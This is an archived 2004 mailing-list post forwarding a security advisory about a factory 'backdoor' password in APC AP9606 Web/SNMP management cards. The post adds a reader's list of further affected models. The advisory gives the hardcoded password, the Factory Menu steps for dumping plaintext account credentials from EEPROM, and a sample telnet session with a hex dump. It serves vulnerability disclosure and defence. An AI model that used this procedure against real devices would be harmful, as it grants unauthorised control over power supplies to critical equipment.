lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 17 Feb 2004 15:23:57 -0300
Subject: Fw: APC 9606 SmartSlot Web/SNMP management card "backdoor" - MORE PROBLEMS

We have many products from APC and we've tested that vulnerability in some
of them and ..... following are the results.

The following systems are vulnerable:
- Silcon DP3320E with Web/SNMP Management Card AP9606 - AOS v3.0.1
- Silcon DP340E with Web/SNMP Management Card AP9606 - AOS v3.0.1

You can't image as critical that vulnerability is for us because the two
systems above are responsible for providing power to our NOC (Network
Operation Center).

I'm not worrying about smaller no-breaks that are responsible for providing
power to ours servers, routers and switches.

Regards, Thiago

----- Forwarded by thiago freitas vazquez SONDA/LIGHT on 17/02/2004 15:06
             Dave Tarbatt                                                  
   >                                               To 
             16/02/2004 08:24                                           cc 
                                       APC 9606 SmartSlot Web/SNMP         
                                       management card "backdoor"          

*** Background:
APC (American Power Conversion) SmartSwitch and UPS (uninterruptible power
supply) products have a Web and SNMP management card installed that permits
local serial console, TELNET, web and SNMP management, monitoring and
mains power control of attached devices.

*** The Problem:
APC SmartSlot Web/SNMP management cards have a "backdoor" password that can
be abused to extract plain text username/password details for all accounts
and hence gain unauthorised full control of the device.

Tested vulnerable:
SmartUPS 3000RM with AP9606 AOS v3.2.1 and SmartUPS App v3.2.6
MasterSwitch AP9212 with AP9606 AOS v3.0.3 and MasterSwitch App v2.2.0

*** Description:
The "backdoor" password is designed for use by the factory for initial
configuration of the card, e.g. MAC Address, Serial Number etc. However, it
is possible to dump the contents of EEPROM which amongst other things
stores the account usernames and passwords.

The "backdoor" password is accepted via either the local serial port or
TELNET. Use of the password on the web interface does not appear to be

*** To recreate (typical example):
Connect a console to the serial port or TELNET to the card. At the username
prompt use any username. The password is all alphabetic characters and is
case sensitive: TENmanUFactOryPOWER

At the selection prompt, type 13 and press return. Type the byte address of
the EEPROM location to view, e.g. 1d0 and press return. Look carefully for
the username and password pairs. Different firmware revisions may have the
account details at different EEPROM locations. The accounts in the example
below are the default accounts after their passwords have been changed.
Username: apc                        Password: BBCCDDEEF
Username: device         Password: AAAABBBBB

Press return to get back to the Factory Menu and press ctrl-A to logout.
You can now TELNET to the card again and use the account details you've
just recovered to log into and control the device.

You should use the other selections with extreme care. You may cause
irrepairable damage and will most certainly invalidate any warranty.
The EEPROM also contains other user-configurable options in either plain
text or binary encoded form. They are not detailed in this advisory.


[root@...ays root]# telnet
Connected to
Escape character is '^]'.

User Name : phade
Password  : TENmanUFactOryPOWER

Factory Menu
<CTRL-A> to exit

500 C0 B7 A2 C8 2D

Selection> 13

Enter byte address in Hex(XXXX): 1d0

01D0   FF 50 46 61 70 63 00 FF  .PFapc..
01D8   FF FF FF FF FF FF 42 42  ......BB
01E0   43 43 44 44 45 45 46 00  CCDDEEF.
01E8   FF 64 65 76 69 63 65 00  .device.
01F0   FF FF FF FF 41 41 41 41  ....AAAA
01F8   42 42 42 42 42 00 FF 61  BBBBB..a
0200   64 6D 69 6E 20 75 73 65  dmin use
0208   72 20 70 68 72 61 73 65  r phrase
0210   00 FF FF FF FF FF FF FF  ........
0218   FF FF FF FF FF FF FF FF  ........
0220   64 65 76 69 63 65 20 75  device u
0228   73 65 72 20 70 68 72 61  ser phra
0230   73 65 00 FF FF FF FF FF  se......
0238   FF FF FF FF FF FF FF FF  ........
0240   FF 00 00 FF FF FF FF 21  .......!
0248   56 00 00 00 00 00 00 55  V......U


*** Workaround/fix:
Ensure that access to the local serial port is physically restricted and
disable the TELNET interface as described in the device documentation. A
patched version of the firmware which requires the management password
to be entered before accessing the factory settings may be available
from APC.

*** Vendor status:
APC were first notified six months ago on 12th August 2003 and were
initially helpful in patching the problem. However, after testing a couple
of beta fixes I've heard nothing for over 3 months.

Dave Tarbatt,


Powered by blists - more mailing lists